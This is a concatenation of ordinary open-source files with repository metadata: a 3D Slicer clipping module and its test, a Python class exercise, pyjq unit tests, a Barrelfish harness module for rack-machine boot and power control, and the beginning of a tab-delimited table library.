landmarkDescription[markupID]["projection"]["closestPointIndex"] = None
landmarkDescription[markupID]["ROIradius"] = 0
fidList.SetAttribute("landmarkDescription",self.encodeJSON(landmarkDescription))
return ModelID, hardenModelID, landmarkDescriptioncopy
def saveFunction(self):
filename = qt.QFileDialog.getSaveFileName(self.interface.parent, "Save file")
tempDictionary = {}
for key in self.ColorNodeCorrespondence:
slice = slicer.util.getNode(self.ColorNodeCorrespondence[key])
tempDictionary[key] = self.getMatrix(slice).tolist()
if filename is None:
filename = qt.QFileDialog.getSaveFileName(self.interface.parent, "Save file")
if filename != "":
fileObj = open(filename, "wb")
pickle.dump(tempDictionary, fileObj)
fileObj.close()
def readPlaneFunction(self):
filename = qt.QFileDialog.getOpenFileName(self.interface.parent, "Open file")
if filename is None:
filename = qt.QFileDialog.getOpenFileName(self.interface.parent, "Open file")
if filename != "":
fileObj = open(filename, "rb")
tempDictionary = pickle.load(fileObj)
for key in self.ColorNodeCorrespondence:
node = slicer.mrmlScene.GetNodeByID(self.ColorNodeCorrespondence[key])
matList = tempDictionary[key]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
node.UpdateMatrices()
fileObj.close()
def encodeJSON(self, input):
    """Serialize 'input' to JSON, swapping double quotes for single quotes
    so the result can be stored in an MRML node attribute."""
    return json.dumps(input).replace('\"', '\'')
def decodeJSON(self, input):
    """Inverse of encodeJSON: restore double quotes, parse, and byteify.

    Returns None for an empty or missing input string.
    """
    if not input:
        return None
    return self.byteify(json.loads(input.replace('\'', '\"')))
def byteify(self, input):
if isinstance(input, dict):
return {self.byteify(key):self.byteify(value) for key,value in input.items()}
elif isinstance(input, list):
return [self.byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
class EasyClipTest(ScriptedLoadableModuleTest):
    """Self-test for the EasyClip module: download a model, place the three
    slice planes at fixed positions, and run the clipping logic."""

    def setUp(self):
        # reset the state - clear scene
        slicer.mrmlScene.Clear(0)

    def runTest(self):
        # run all tests needed
        self.setUp()
        self.test_EasyClip()

    def test_EasyClip(self):
        """End-to-end test: load data, position planes, clip."""
        self.delayDisplay("Starting the test")
        ###################################################################################################
        #                                 Loading some data                                               #
        ###################################################################################################
        import urllib.request
        # (url, local file name, loader callback) triples
        downloads = (
            ('http://slicer.kitware.com/midas3/download?items=167065', 'model.vtk', slicer.util.loadModel),
        )
        for url,name,loader in downloads:
            filePath = slicer.app.temporaryPath + '/' + name
            # only download when the cached copy is missing or empty
            if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:
                print('Requesting download %s from %s...\n' % (name, url))
                urllib.request.urlretrieve(url, filePath)
            if loader:
                print('Loading %s...\n' % (name,))
                loader(filePath)
        self.delayDisplay('Finished with download and loading\n')

        # center the 3D view on the loaded model
        layoutManager = slicer.app.layoutManager()
        threeDWidget = layoutManager.threeDWidget(0)
        threeDView = threeDWidget.threeDView()
        threeDView.resetFocalPoint()
        self.delayDisplay('Model loaded')

        ###################################################################################################
        #                                 Initialize Plane Position                                       #
        ###################################################################################################
        redslice = slicer.util.getNode('vtkMRMLSliceNodeRed')
        yellowslice = slicer.util.getNode('vtkMRMLSliceNodeYellow')
        greenslice = slicer.util.getNode('vtkMRMLSliceNodeGreen')
        # print redslice, yellowslice, greenslice
        self.delayDisplay('Planes are displayed!')

        #Put planes at specific places
        # Translation lives in column 3 of the SliceToRAS matrix.
        matRed = redslice.GetSliceToRAS()
        matRed.SetElement(0,3,0)
        matRed.SetElement(1,3,0)
        matRed.SetElement(2,3,8)
        redslice.SetWidgetVisible(True)
        print(matRed)
        matYellow = yellowslice.GetSliceToRAS()
        matYellow.SetElement(0,3,-3)
        matYellow.SetElement(1,3,0)
        matYellow.SetElement(2,3,0)
        print(matYellow)
        yellowslice.SetWidgetVisible(True)
        matGreen = greenslice.GetSliceToRAS()
        matGreen.SetElement(0,3,0)
        matGreen.SetElement(1,3,-9)
        matGreen.SetElement(2,3,0)
        print(matGreen)
        greenslice.SetWidgetVisible(True)
        self.delayDisplay('planes are placed!')

        # run the actual clipping on the placed planes
        logic = EasyClipLogic(slicer.modules.EasyClipWidget)
        logic.getCoord()
        logic.clipping()
        self.delayDisplay('Test passed!')
| {
"content_hash": "b12ea5210c6aebdb77fcc6d44e4d80c6",
"timestamp": "",
"source": "github",
"line_count": 651,
"max_line_length": 149,
"avg_line_length": 51.3778801843318,
"alnum_prop": 0.570185666875953,
"repo_name": "DCBIA-OrthoLab/EasyClip-Extension",
"id": "6f362532a78c55736584dae2637a806cc2acff5c",
"size": "33447",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "EasyClip/EasyClip.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "2369"
},
{
"name": "Python",
"bytes": "33447"
}
],
"symlink_target": ""
} |
"""
Created on Mon Jul 17 16:17:25 2017
@author: jorgemauricio
- Definir una clase llamada Circulo que pueda ser construida por el radio.
La clase Circulo debe de contener un método que pueda calcular el área
"""
class Circulo:
    """A circle constructed from its radius."""

    def __init__(self, r):
        """Store the radius 'r' of the circle."""
        self.radius = r

    def calcularArea(self):
        """Return the area of the circle (pi * radius**2)."""
        # Local import keeps the module free of top-level dependencies.
        import math
        # math.pi is exact to double precision, unlike the old 3.1416 literal.
        return self.radius**2 * math.pi
| {
"content_hash": "f8e671461c29302a3d53668c4e648e8c",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 75,
"avg_line_length": 23.533333333333335,
"alnum_prop": 0.6798866855524079,
"repo_name": "jorgemauricio/INIFAP_Course",
"id": "83cd0d35f911980045ce8ca504adc0eeb68e1fa5",
"size": "402",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Exams/Respuestas/ejercicio_14_r.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "11052861"
},
{
"name": "Python",
"bytes": "59081"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import io
import os.path
import re
import shutil
import tempfile
import unittest
from datetime import datetime
from unittest.mock import patch
import pytest
import _pyjq
import pyjq
def test_compile_dot():
    """Compiling the identity program yields a low-level Script object."""
    script = pyjq.compile(".")
    assert isinstance(script, _pyjq.Script)
def test_syntax_error():
    """Compiling an invalid jq program raises ValueError carrying jq's message."""
    with pytest.raises(ValueError, match=r"error: syntax error"):
        pyjq.compile("**")
def test_non_json_data():
    """Values with no JSON representation raise TypeError on conversion."""
    with pytest.raises(
        TypeError,
        match=re.escape("<class 'datetime.datetime'> could not be converted to json"),
    ):
        pyjq.all(".", {"date": datetime.now()})
def test_conversion_between_python_object_and_jv():
    """Round-tripping values through the identity program preserves them."""
    samples = [
        None,
        False,
        True,
        1,
        1.5,
        "string",
        [None, False, True, 1, 1.5, [None, False, True], {"foo": "bar"}],
        {
            "key1": None,
            "key2": False,
            "key3": True,
            "key4": 1,
            "key5": 1.5,
            "key6": [None, False, True, 1, 1.5, [None, False, True], {"foo": "bar"}],
        },
    ]
    identity = pyjq.compile(".")
    for sample in samples:
        assert identity.all(sample) == [sample]
def test_assigning_values():
    """$-variables passed via 'vars' are visible inside the program."""
    assert pyjq.one("$foo", {}, vars={"foo": "bar"}) == "bar"
    assert pyjq.one("$foo", {}, vars={"foo": ["bar"]}) == ["bar"]
def test_all():
    """pyjq.all returns every output of the program as a list."""
    expected = [
        "val1bar",
        "val2bar",
    ]
    assert pyjq.all(".[] | . + $foo", ["val1", "val2"], vars={"foo": "bar"}) == expected
    assert pyjq.all(". + $foo", "val", vars={"foo": "bar"}) == ["valbar"]
def test_first():
    """pyjq.first returns only the first output of the program."""
    result = pyjq.first(".[] | . + $foo", ["val1", "val2"], vars={"foo": "bar"})
    assert result == "val1bar"
def test_one():
    """pyjq.one demands exactly one output from the program."""
    assert pyjq.one(". + $foo", "val", vars={"foo": "bar"}) == "valbar"
    # multiple outputs and zero outputs both raise IndexError
    for bad_input in ([1, 2], []):
        with pytest.raises(IndexError):
            pyjq.one(".[]", bad_input)
def test_url_argument():
    """Input can be fetched from a URL, honoring the response charset."""
    class StubResponse:
        def getheader(self, name):
            return "application/json;charset=SHIFT_JIS"

        def read(self):
            return '["Hello", "世界", "!"]'.encode("shift-jis")

    with patch("urllib.request.urlopen", return_value=StubResponse()):
        result = pyjq.all(".[] | . + .", url="http://example.com")
        assert result == [
            "HelloHello",
            "世界世界",
            "!!",
        ]

    # a custom opener bypasses urllib entirely
    def fake_opener(url):
        return [1, 2, 3]

    assert pyjq.all(".[] | . + .", url="http://example.com", opener=fake_opener) == [2, 4, 6]
def test_library_path(tmp_path_factory):
    """jq programs may 'include' modules found on library_paths."""
    path_a = tmp_path_factory.mktemp("a")
    path_b = tmp_path_factory.mktemp("b")
    greeting_module = path_a / "greeting.jq"
    increment_module = path_b / "increment.jq"
    with greeting_module.open("w", encoding="ascii") as f:
        f.write('def hello: "HELLO";')
        f.write('def world: "WORLD";')
    with increment_module.open("w", encoding="ascii") as f:
        f.write("def increment: . + 1;\n")
    values = pyjq.all(
        'include "greeting"; include "increment"; .[] | [. | increment, hello, world]',
        [1, 2, 3],
        # It accepts both of str and pathlib.Path
        library_paths=[str(path_a), path_b],
    )
    assert values == [
        [2, "HELLO", "WORLD"],
        [3, "HELLO", "WORLD"],
        [4, "HELLO", "WORLD"],
    ]
def test_script_runtime_error_exported():
    """ScriptRuntimeError is part of the public pyjq API (AttributeError otherwise)."""
    pyjq.ScriptRuntimeError # exported
| {
"content_hash": "5286ea04b05f12d4b92100ec943b6c88",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 88,
"avg_line_length": 25.092198581560282,
"alnum_prop": 0.5356133408705483,
"repo_name": "doloopwhile/pyjq",
"id": "bacc0f4bbccdae2a8c71e24d9139450ec16f1efc",
"size": "3573",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_pyjq.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cython",
"bytes": "6654"
},
{
"name": "Python",
"bytes": "9368"
}
],
"symlink_target": ""
} |
import os, getpass, subprocess, socket, pty
import debug, eth_machinedata
from machines import Machine, MachineLockedError, MachineFactory,\
MachineOperations
from subprocess_timeout import wait_or_terminate
# Root of the network-boot file tree served over TFTP.
TFTP_PATH='/home/netos/tftpboot'
# Shared admin tools used to control the ETH rack machines.
TOOLS_PATH='/home/netos/tools/bin'
# Script that configures a machine's network boot target.
RACKBOOT=os.path.join(TOOLS_PATH, 'rackboot.sh')
# Utility that toggles a rack machine's power.
RACKPOWER=os.path.join(TOOLS_PATH, 'rackpower')
class ETHBaseMachine(Machine):
    """Common base for ETH-hosted test machines.

    Fixes the serial driver shared by all ETH rack machines.
    """
    # machine database; populated by concrete subclasses
    _machines = None

    def __init__(self, options,
                 operations,
                 serial_binary='serial_pc16550d',
                 **kwargs):
        # All ETH machines use the PC16550D serial driver by default.
        super(ETHBaseMachine, self).__init__(options, operations,
                                             serial_binary=serial_binary,
                                             **kwargs)

    def get_perfcount_type(self):
        # NOTE(review): _perfcount_type is not assigned in this class;
        # presumably set by Machine or machine data — confirm.
        return self._perfcount_type
class ETHBaseMachineOperations(MachineOperations):
    """Machine operations shared by ETH rack machines.

    Locking is implemented by holding a conserver 'console' session open
    on the machine's serial console for the lifetime of the lock.
    """

    def __init__(self, machine):
        super(ETHBaseMachineOperations, self).__init__(machine)
        # handle of the background 'console' process holding the lock
        self.lockprocess = None
        # master side of the PTY the console process is attached to
        self.masterfd = None

    def _get_console_status(self):
        # subclasses must return the 'console -i' status line for the machine
        raise NotImplementedError

    def lock(self):
        """Use conserver to lock the machine."""
        # find out current status of console
        cstate = self._get_console_status()
        # check that nobody else has it open for writing
        myuser = getpass.getuser()
        parts = cstate.strip().split(':')
        conname, child, contype, details, users, state = parts[:6]
        if users:
            for userinfo in users.split(','):
                mode, username, host, port = userinfo.split('@')[:4]
                if 'w' in mode and username != myuser:
                    raise MachineLockedError # Machine is not free
        # run a console in the background to 'hold' the lock and read output
        debug.verbose('starting "console %s"' % self._machine.get_machine_name())
        # run on a PTY to work around terminal mangling code in console
        (self.masterfd, slavefd) = pty.openpty()
        self.lockprocess = subprocess.Popen(["console", self._machine.get_machine_name()],
                                            close_fds=True,
                                            stdout=slavefd, stdin=slavefd)
        os.close(slavefd)
        # XXX: open in binary mode with no buffering
        # otherwise select.select() may block when there is data in the buffer
        self.console_out = os.fdopen(self.masterfd, 'rb', 0)

    def unlock(self):
        """Release the lock by quitting the background console session."""
        if self.lockprocess is None:
            return # noop
        debug.verbose('quitting console process (%d)' % self.lockprocess.pid)
        # os.kill(self.lockprocess.pid, signal.SIGTERM)
        # Ctrl-E c . is conserver's escape sequence for 'disconnect'.
        os.write(self.masterfd, "\x05c.")
        wait_or_terminate(self.lockprocess)
        self.lockprocess = None
        self.masterfd = None

    # this expects a pexpect object for `consolectrl`
    def force_write(self, consolectrl):
        """Force read-write console access (conserver Ctrl-E c f)."""
        try:
            consolectrl.send('\x05cf')
        except:
            print "Unable to force write control through consolectrl, trying masterfd"
            os.write(self.masterfd, "\x05cf")

    def get_output(self):
        # unbuffered binary stream of the machine's console output
        return self.console_out
class ETHMachine(ETHBaseMachine):
    """An ETH rack machine, described by an entry in eth_machinedata."""

    _machines = eth_machinedata.machines

    def __init__(self, options, **kwargs):
        super(ETHMachine, self).__init__(options, ETHMachineOperations(self), **kwargs)

    def get_buildall_target(self):
        """Build target for this machine; defaults to <BOOTARCH>_Full."""
        machine_info = self._machines[self.name]
        if 'buildall_target' in machine_info:
            return machine_info['buildall_target']
        return self.get_bootarch().upper() + "_Full"

    def get_xphi_ncores(self):
        """Number of Xeon Phi cores, or 0 when the machine has none."""
        return self._machines[self.name].get('xphi_ncores', 0)

    def get_xphi_ncards(self):
        """Number of Xeon Phi cards, or 0 when the machine has none."""
        return self._machines[self.name].get('xphi_ncards', 0)

    def get_xphi_ram_gb(self):
        """Xeon Phi RAM in GB, or 0 when the machine has none."""
        return self._machines[self.name].get('xphi_ram_gb', 0)

    def get_xphi_tickrate(self):
        """Xeon Phi tick rate, or 0 when the machine has none."""
        return self._machines[self.name].get('xphi_tickrate', 0)

    def get_hostname(self):
        """Fully qualified DNS name of this machine."""
        return self.get_machine_name() + '.in.barrelfish.org'

    def get_ip(self):
        """IPv4 address of this machine, resolved via DNS."""
        return socket.gethostbyname(self.get_hostname())
class ETHMachineOperations(ETHBaseMachineOperations):
    """Operations for ETH rack machines: TFTP boot setup and rack power."""

    def __init__(self, machine):
        super(ETHMachineOperations, self).__init__(machine)

    def get_tftp_dir(self):
        """Absolute path of this user's per-machine TFTP directory."""
        user = getpass.getuser()
        return os.path.join(TFTP_PATH, user, self._machine.name + "_harness")

    def get_tftp_subdir(self):
        """TFTP directory path relative to TFTP_PATH."""
        user = getpass.getuser()
        return os.path.join(user, self._machine.name + "_harness")

    def _write_menu_lst(self, data, path):
        """Write boot-menu 'data' to 'path'."""
        debug.verbose('writing %s' % path)
        debug.debug(data)
        with open(path, 'w') as f:
            f.write(data)

    def _get_menu_lst_name(self):
        # ARMv8 machines boot via a Hagfish (UEFI) config; others use menu.lst.
        if self._machine.get_bootarch() == "armv8":
            return "hagfish.cfg"
        else:
            return "menu.lst"

    def _set_menu_lst(self, relpath):
        """Repoint the machine's per-IP boot-menu symlink at 'relpath'."""
        ip_menu_name = os.path.join(TFTP_PATH, self._get_menu_lst_name() + "." + self._machine.get_ip())
        debug.verbose('relinking %s to %s' % (ip_menu_name, relpath))
        os.remove(ip_menu_name)
        os.symlink(relpath, ip_menu_name)

    def set_bootmodules(self, modules):
        """Write the boot menu for 'modules' and activate it for this machine."""
        fullpath = os.path.join(self.get_tftp_dir(), self._get_menu_lst_name())
        relpath = os.path.relpath(fullpath, TFTP_PATH)
        tftppath = '/' + os.path.relpath(self.get_tftp_dir(), TFTP_PATH)
        self._write_menu_lst(modules.get_menu_data(tftppath), fullpath)
        self._set_menu_lst(relpath)

    def _get_console_status(self):
        """Return the 'console -i' status line for this machine."""
        debug.verbose('executing "console -i %s" to check state' %
                      self._machine.get_machine_name())
        proc = subprocess.Popen(["console", "-i", self._machine.get_machine_name()],
                                stdout=subprocess.PIPE)
        line = proc.communicate()[0]
        assert(proc.returncode == 0)
        return line

    def __rackboot(self, args):
        # configure network boot via the shared rackboot.sh tool
        debug.checkcmd([RACKBOOT] + args + [self._machine.get_machine_name()])

    def setup(self):
        """Configure this machine for network boot."""
        if self._machine.get_bootarch() == "armv8":
            self.__rackboot(["-b", "-H", "-n"])
        else:
            self.__rackboot(["-b", "-n"])

    def __rackpower(self, arg):
        # power control is best-effort: a failure is logged, not fatal
        try:
            debug.checkcmd([RACKPOWER, arg, self._machine.get_machine_name()])
        except subprocess.CalledProcessError:
            debug.warning("rackpower %s %s failed" %
                          (arg, self._machine.get_machine_name()))

    def reboot(self):
        """Power-cycle the machine."""
        self.__rackpower('-r')

    def shutdown(self):
        """Power the machine off."""
        self.__rackpower('-d')
# Register every known ETH machine with the MachineFactory. A fresh
# subclass is created per machine so each factory entry carries its own
# 'name' class attribute.
for n in sorted(ETHMachine._machines.keys()):
    class TmpMachine(ETHMachine):
        name = n
    MachineFactory.addMachine(n, TmpMachine, **ETHMachine._machines[n])
| {
"content_hash": "750ba27e5258b7162032720d251299bc",
"timestamp": "",
"source": "github",
"line_count": 202,
"max_line_length": 104,
"avg_line_length": 35.539603960396036,
"alnum_prop": 0.5915865719459534,
"repo_name": "kishoredbn/barrelfish",
"id": "f93b9c9bbd501f2c8b86edeb1d5c9be63d62d4b3",
"size": "7610",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/harness/machines/eth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "2589287"
},
{
"name": "Awk",
"bytes": "9178"
},
{
"name": "Batchfile",
"bytes": "49856"
},
{
"name": "C",
"bytes": "77396109"
},
{
"name": "C++",
"bytes": "14632842"
},
{
"name": "CMake",
"bytes": "5175"
},
{
"name": "CSS",
"bytes": "1905"
},
{
"name": "DIGITAL Command Language",
"bytes": "278456"
},
{
"name": "Emacs Lisp",
"bytes": "23337"
},
{
"name": "Gnuplot",
"bytes": "3383"
},
{
"name": "Groff",
"bytes": "407423"
},
{
"name": "HTML",
"bytes": "377310"
},
{
"name": "Haskell",
"bytes": "147463"
},
{
"name": "Lex",
"bytes": "2872"
},
{
"name": "Logos",
"bytes": "31891"
},
{
"name": "Makefile",
"bytes": "850866"
},
{
"name": "Objective-C",
"bytes": "43119"
},
{
"name": "Perl",
"bytes": "2688059"
},
{
"name": "Perl6",
"bytes": "255974"
},
{
"name": "Prolog",
"bytes": "2571678"
},
{
"name": "Protocol Buffer",
"bytes": "2764"
},
{
"name": "Scheme",
"bytes": "4249"
},
{
"name": "Scilab",
"bytes": "5315"
},
{
"name": "Shell",
"bytes": "719683"
},
{
"name": "SuperCollider",
"bytes": "8638"
},
{
"name": "Tcl",
"bytes": "18714"
},
{
"name": "TeX",
"bytes": "411611"
},
{
"name": "XS",
"bytes": "4319"
},
{
"name": "XSLT",
"bytes": "1792"
},
{
"name": "Yacc",
"bytes": "11190"
},
{
"name": "eC",
"bytes": "5079"
}
],
"symlink_target": ""
} |
"""
tablelib.py
Parse, format, and manipulate tabular data.
--Example----------------------------------------------------
##types:string int
name num
mike 23
alex 12
matt 7
-------------------------------------------------------------
File is tab delimited.
Directives are on a single line and begin with two hashes '##'
No space after colon is allowed.
Table can also handle custom types. Custom types must do the following
1. default value:
default = mytype()
returns default value
2. convert from string
val = mytype(string)
converts from string to custom type
3. convert to string
string = str(val)
converts val of type 'mytype' to a string
4. type inference (optional)
type(val)
returns instance of 'mytype'
TODO: I could not require this (only map() really needs it and __init__())
"""
# python libs
import copy
from itertools import chain, imap, izip
import os
from sqlite3 import dbapi2 as sqlite
from StringIO import StringIO
import sys
# rasmus libs
from rasmus import util
# table directives
# DIR_TYPES marks where a '##types:' line belongs inside Table.comments.
DIR_TYPES = 1

# a special unique null type (more 'null' than None)
# Used as a sentinel default so that None stays a usable value (see add_col).
NULL = object()
class TableException (Exception):
    """Exception class for Table.

    The message is prefixed with 'filename' and/or 'line N' when known,
    e.g. "data.txt line 3: <errmsg>".
    """

    def __init__(self, errmsg, filename=None, lineno=None):
        # build the optional "<filename> line <N>: " location prefix
        location = ""
        if filename:
            location = "%s" % filename
        if lineno:
            if location:
                location += " "
            location += "line %d" % lineno
        if location:
            location += ": "
        Exception.__init__(self, location + errmsg)
#===========================================================================
# Types handling
def guess_type(text):
    """Guess the type of a value encoded in a string.

    Tries int, then float, then bool; falls back to str.
    """
    # Narrowed from a bare 'except:', which silently swallowed every
    # exception (including KeyboardInterrupt and typos in this function).
    try:
        int(text)
        return int
    except (ValueError, TypeError):
        pass

    try:
        float(text)
        return float
    except (ValueError, TypeError):
        pass

    try:
        str2bool(text)
        return bool
    except ValueError:
        pass

    return str
def str2bool(text=None):
    """Parse a boolean stored as a string ('true'/'false', case-insensitive).

    A missing value (None) yields the default, False. Any other string
    raises ValueError.
    """
    if text is None:
        # default value
        return False
    lowered = text.lower()
    if lowered == "true":
        return True
    if lowered == "false":
        return False
    raise ValueError("unknown string for bool '%s'" % lowered)
# Name <-> type registry used by parse_type() and format_type().
_type_definitions = [
    ["string", str],
    ["unknown", str],  # backward-compatible name
    ["str", str],  # backward-compatible name
    ["string", unicode],  # Python 2 only; NameError on Python 3
    ["int", int],
    ["int", long],  # Python 2 only
    ["float", float],
    ["bool", bool],
]
# NOTE: ordering of name-type pairs is important
# the first occurrence of a type gives the preferred name for writing
def parse_type(type_name):
    """Parse a type name into a type.

    Raises Exception for a name not present in _type_definitions.
    """
    for registered_name, registered_type in _type_definitions:
        if registered_name == type_name:
            return registered_type
    raise Exception("unknown type '%s'" % type_name)
def format_type(type_object):
    """Format a type into its preferred type name.

    Raises Exception for a type not present in _type_definitions.
    """
    for registered_name, registered_type in _type_definitions:
        if registered_type == type_object:
            return registered_name
    raise Exception("unknown type '%s'" % type_object)
#===========================================================================
# Table class
class Table (list):
"""A table of data"""
def __init__(self, rows=None,
headers=None,
types={},
filename=None,
nheaders=1):
# set table info
self.headers = copy.copy(headers)
self.types = copy.copy(types)
self.comments = []
self.delim = "\t"
self.nheaders = nheaders
self.filename = filename
# set data
if rows:
self._set_data(rows)
def _set_data(self, rows=[]):
"""Set the table data from an iterable."""
try:
# use first row to guess data style
rows = iter(rows)
first_row = rows.next()
except StopIteration:
# No data given
return
if isinstance(first_row, dict):
# data is a list of dicts
# set default headers based on first row keys
if self.headers is None:
self.headers = sorted(first_row.keys())
# add data
self.extend(imap(dict, chain([first_row], rows)))
elif isinstance(first_row, (list, tuple)):
# data is a list of lists
# use first row to determine headers
if self.nheaders == 0:
if self.headers is None:
self.headers = range(len(first_row))
rows = chain([first_row], rows)
else:
if self.headers is None:
self.headers = list(first_row)
# add data
self.extend(dict(zip(self.headers, row)) for row in chain([first_row], rows))
# guess any types not specified
if len(self) > 0:
for key in self.headers:
row = self[0]
if key not in self.types:
self.types[key] = type(row[key])
def clear(self, headers=None, delim="\t", nheaders=1, types=None):
"""Clear the contents of the table."""
# clear table info
self.headers = copy.copy(headers)
if types is None:
self.types = {}
else:
self.types = copy.copy(types)
self.comments = []
self.delim = delim
self.nheaders = nheaders
# clear data
self[:] = []
def new(self, headers=None):
"""
Return a new table with the same info but no data.
headers: if specified, only a subset of the headers will be copied.
"""
if headers is None:
headers = self.headers
tab = type(self)(headers=headers)
tab.types = util.subdict(self.types, headers)
tab.comments = copy.copy(self.comments)
tab.delim = self.delim
tab.nheaders = self.nheaders
return tab
#===================================================================
# Input/Output
def read(self, filename, delim="\t", nheaders=1,
headers=None, types=None, guess_types=True):
self.extend(self.read_iter(
filename, delim=delim, nheaders=nheaders,
headers=headers, types=types,
guess_types=guess_types))
return self
def read_iter(self, filename, delim="\t", nheaders=1,
headers=None, types=None, guess_types=True):
"""
Reads a character delimited file and yields a dict for each row.
Blank lines are skipped. Lines that start with a single '#'
are treated as comments. Lines starting with '##' are treated as
directives.
"""
infile = util.open_stream(filename)
# remember filename for later saving
if isinstance(filename, str):
self.filename = filename
# clear table
self.clear(headers, delim, nheaders, types)
# temps for reading only
self._tmptypes = None
first_row = True
# line number for error reporting
lineno = 0
try:
for line in infile:
line = line.rstrip('\n')
lineno += 1
# skip blank lines
if len(line) == 0:
continue
# handle comments
if line[0] == "#":
if not self._read_directive(line):
self.comments.append(line)
continue
# split row into tokens
tokens = line.split(delim)
# if no headers read yet, use this line as a header
if not self.headers:
# parse headers
if self.nheaders > 0:
self._parse_header(tokens)
continue
else:
# default headers are numbers
self.headers = range(len(tokens))
assert len(tokens) == len(self.headers), tokens
# populate types
if first_row:
first_row = False
if self._tmptypes:
# use explicit types
assert len(self._tmptypes) == len(self.headers)
self.types = dict(zip(self.headers, self._tmptypes))
else:
# default types
if guess_types:
for token, header in zip(tokens, self.headers):
self.types.setdefault(header,
guess_type(token))
else:
for header in self.headers:
self.types.setdefault(header, str)
# parse data
row = {}
for header, token in izip(self.headers, tokens):
type_object = self.types[header]
if type_object is bool:
type_object = str2bool
row[header] = type_object(token)
# yield completed row
yield row
except Exception, e:
# report error in parsing input file
raise TableException(str(e), self.filename, lineno)
# clear temps
del self._tmptypes
def _parse_header(self, tokens):
"""Parse the tokens as headers"""
self.headers = tokens
# check that headers are unique
check = set()
for header in self.headers:
if header in check:
raise TableException("Duplicate header '%s'" % header)
check.add(header)
def write(self, filename=sys.stdout, delim="\t", comments=False,
nheaders=None):
"""Write a table to a file or stream.
If 'filename' is a string it will be opened as a file.
If 'filename' is a stream it will be written to directly.
"""
# remember filename for later saving
if isinstance(filename, str):
self.filename = filename
out = util.open_stream(filename, "w")
self.write_header(out, delim=delim, comments=comments,
nheaders=(nheaders if nheaders is not None
else self.nheaders))
# tmp variable
types = self.types
# write data
for row in self:
# code is inlined here for speed
rowstr = []
for header in self.headers:
if header in row:
rowstr.append(types[header].__str__(row[header]))
else:
rowstr.append('')
out.write(delim.join(rowstr))
out.write('\n')
def write_header(self, out=sys.stdout, delim="\t", comments=False,
nheaders=None):
# ensure all info is complete.
# introspect types or use str by default.
for key in self.headers:
if key not in self.types:
if len(self) > 0:
self.types[key] = type(self[0][key])
else:
self.types[key] = str
# ensure types are in directives
if DIR_TYPES not in self.comments:
self.comments.insert(0, DIR_TYPES)
# write comments
if comments:
for line in self.comments:
if isinstance(line, str):
out.write(line)
out.write('\n')
else:
self._write_directive(line, out, delim)
# write header
if nheaders > 0:
out.write(delim.join(self.headers))
out.write('\n')
def write_row(self, out, row, delim="\t"):
rowstr = []
types = self.types
for header in self.headers:
if header in row:
rowstr.append(types[header].__str__(row[header]))
else:
rowstr.append('')
out.write(delim.join(rowstr))
out.write("\n")
def save(self):
"""
Writes the table to the last used filename.
"""
if self.filename is not None:
self.write(self.filename)
else:
raise Exception("Table has no filename")
#===================================================================
# Input/Output: Directives
def _determine_directive(self, line):
if line.startswith("##types:"):
return DIR_TYPES
else:
return None
def _read_directive(self, line):
"""Attempt to read a line with a directive"""
directive = self._determine_directive(line)
if directive is None:
return False
rest = line[line.index(":")+1:]
self.comments.append(directive)
if directive == DIR_TYPES:
self._tmptypes = map(
parse_type, rest.rstrip('\n').split(self.delim))
return True
else:
return False
def _write_directive(self, line, out, delim):
"""Write a directive"""
if line == DIR_TYPES:
out.write("##types:" + delim.join(format_type(self.types[h])
for h in self.headers) + "\n")
else:
raise "unknown directive:", line
#===================================================================
# Table manipulation
def add(self, **kargs):
"""Add a row to the table
tab.add(col1=val1, col2=val2, col3=val3)
"""
self.append(kargs)
def add_col(self, header, coltype=None, default=NULL, pos=None, data=None):
"""Add a column to the table. You must populate column data yourself.
header - name of the column
coltype - type of the values in that column
default - default value of the column
pos - position to insert column (default: right-end)
"""
# ensure header is unique
if header in self.headers:
raise Exception("header '%s' is already in table" % header)
# default column position is last column
if pos is None:
pos = len(self.headers)
# default coltype is guessed from data
if coltype is None:
if data is None:
raise Exception("must specify data or coltype")
else:
coltype = type(data[0])
# default value is inferred from column type
if default is NULL:
default = coltype()
# update table info
self.headers.insert(pos, header)
self.types[header] = coltype
# add data
if data is not None:
for i in xrange(len(self)):
self[i][header] = data[i]
def remove_col(self, *cols):
"""Removes a column from the table"""
for col in cols:
self.headers.remove(col)
del self.types[col]
for row in self:
del row[col]
def rename_col(self, oldname, newname):
"""Renames a column"""
# change header
col = self.headers.index(oldname)
if col == -1:
raise Exception("column '%s' is not in table" % oldname)
self.headers[col] = newname
# change info
self.types[newname] = self.types[oldname]
del self.types[oldname]
# change data
for row in self:
row[newname] = row[oldname]
del row[oldname]
def get_matrix(self, rowheader="rlabels"):
"""Returns mat, rlabels, clabels
where mat is a copy of the table as a 2D list
rlabels are the row labels
clabels are the column labels
"""
# get labels
if rowheader is not None and rowheader in self.headers:
rlabels = self.cget(rowheader)
clabels = copy.copy(self.headers)
clabels.remove(rowheader)
else:
rlabels = range(len(self))
clabels = copy.copy(self.headers)
# get data
mat = []
for row in self:
mat.append(util.mget(row, clabels))
return mat, rlabels, clabels
def as_lists(self, cols=None):
"""Iterate over rows as lists"""
if cols is None:
cols = self.headers
for row in self:
yield [row[header] for header in cols]
def as_tuples(self, cols=None):
"""Iterate over rows as lists"""
if cols is None:
cols = self.headers
for row in self:
yield tuple(row[header] for header in cols)
def filter(self, cond):
"""Returns a table with a subset of rows such that cond(row) == True"""
tab = self.new()
for row in self:
if cond(row):
tab.append(row)
return tab
def map(self, func, headers=None):
"""Returns a new table with each row mapped by function 'func'"""
if len(self) == 0:
# handle case of zero length table
return self.new()
# determine what table will look like from first row
